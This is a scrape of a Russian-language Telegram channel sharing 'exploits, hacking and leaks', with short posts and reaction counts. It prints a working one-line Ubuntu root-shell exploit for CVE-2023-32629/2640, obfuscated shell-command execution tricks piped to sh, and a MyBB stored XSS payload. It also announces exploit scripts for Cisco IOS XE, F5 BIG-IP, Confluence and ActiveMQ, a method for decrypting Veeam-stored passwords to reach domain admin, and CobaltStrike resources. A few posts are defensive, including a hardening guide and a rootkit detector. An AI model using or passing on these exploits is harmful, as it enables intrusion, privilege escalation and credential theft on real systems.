Proxy Bar – Telegram
Proxy Bar
19.5K subscribers
1.29K photos
79 videos
664 files
1.32K links
Exploits, Hacking and Leaks

Чат группы - https://news.1rj.ru/str/chat_proxy_bar

Связь с администрацией и реклама:
@NULL_vm

Поддержать проект:
BTC bc1qmrt229eghjyj9wqa7nmr9j8zuq6khz6km2pker
Download Telegram
Cisco IOS XE
CVE
-2023-20198
POC creates a user named baduser with privilege level 15
👍19🔥5
$(echo -e "\x2f\x75\x73\x72\x2f\x62\x69\x6e\x2f\x77\x68\x6f\x61\x6d\x69")
👍25😱4
проклято ))
👍22😱2
parts=(" /" "us" ";r" " /" ";b" "in" "; /" "who" "a" "mi" "")
command="${parts[0]}${parts[1]}${parts[2]}${parts[3]}${parts[4]}${parts[5]}${parts[6]}${parts[7]}${parts[8]}${parts[9]}${parts[10]}"
echo $command | tr -d ' ;' | sh

echo "00101111 01110101 01110011 01110010 00101111 01100010 01101001 01101110 00101111 01110111 01101000 01101111 01100001 01101101 01101001" | perl -lape '$_=pack"(B8)*",@F
' | sh
👍31😱3
exploit for cve-2023-46747
F5 BIG-IP unauthenticated remote code execution
*
exploit
👍12🔥3😱1
левая коронная
правая похоронная
🔥78👍9😱2
List of Awesome CobaltStrike Resources
link

#cobalt
👍10
Give me a ping, Vasily
👍19😱2
Linux hardening guide
Интересная версия еще одного гайда по усилению безопасности linux.
Интересно про ptrace и memory allocator
LINK
👍26🔥1
Maltrail - Система обнаружения вредоносного трафика
RCE Exploit (version Maltrail-0.53)
*
exploit.py
👍11
CVE-2023-22518
Confluence Data Center и Confluence Server

*
exploit.py
🔥9👍5
CVE-2023-46251 - Stored DOM XSS
MyBB < 1.8.37
usage:
[size='1337px;\">>\<img/src=ccc/ onerror=alert`1`//id=name //&pt;']eviltext[/size]

UPD: impact
🔥12👍4😱3
Надо ребрендинг канала делать, просто золото )
🔥29😱1
VEEAM 😋
Это кладезь привилегированных учетных записей (AD, Linux, Cloud)
Лежат себе плохо привинченные, осталось только забрать.

В общем читаем и погружаемся:
1 - From VEEAM to Domain Administrator
2 - Decrypting VEEAM Passwords
3 - Используем тулзу SharpVeeamDecryptor

#veeam #passwd
🔥18😱4
CVE-2023-46604 ActiveMQ RCE
exploit + xml

#activemq
👍8🔥5
Сезон охоты за киберугрозами открыт. Получите навыки выявления аномалий в инфраструктуре с помощью формулировки гипотез и их дальнейшей проверки.

Идет набор на практический курс по поиску киберугроз Threat Hunting, вы научитесь:

— выявлять аномалии на хосте и в сетевом трафике, которые не были задетектированы стандартными средствами защиты;
— отличать аномалии от легитимного поведения;
— понимать мышление злоумышленника;
— формулировать и проверять гипотезы о киберугрозах.

Кстати, начать можете бесплатно — чтобы оценить, насколько вам подходит формат обучения.
🔥12👍1
CVE-2023-32629 и CVE-2023-2640
Ubuntu Privilege Escalation
*
BASH одной строкой:
unshare -rm sh -c "mkdir l u w m && cp /u*/b*/p*3 l/;setcap cap_setuid+eip l/python3;mount -t overlay overlay -o rw,lowerdir=l,upperdir=u,workdir=w m && touch m/*; python3 -c 'import os;os.setuid(0);os.system(\"/bin/bash\")'"

#ubuntu #lpe
🔥38👍2
update для CVE-2023-32629 и CVE-2023-2640
BashСИшечка такая
🔥28👍4👌2
ved-ebpf: Kernel Exploit and Rootkit Detection using eBPF
статья - тут
Тулза VED-eBPF - тут

#kernel #linux #ebpf #rootkit
👍10
200+ PDF
Hacking and Infosec
Link
👍29🔥1